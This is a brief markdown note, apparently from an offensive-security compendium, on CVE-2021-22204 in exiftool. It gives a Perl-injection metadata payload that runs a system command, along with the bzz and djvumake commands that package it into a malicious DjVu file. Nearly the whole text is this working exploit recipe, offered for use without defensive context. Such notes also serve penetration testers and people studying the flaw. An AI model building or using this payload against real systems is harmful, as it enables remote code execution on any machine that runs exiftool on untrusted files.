killchain-compendium/exploit/linux/exiftool.md

CVE-2021-22204

• Craft an a payload and execute it via exiftool
• Article

Usage

• Payload is (metadata "\c${system('id')};")

sudo apt install djvulibre-bin
bzz payload payload.bzz
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz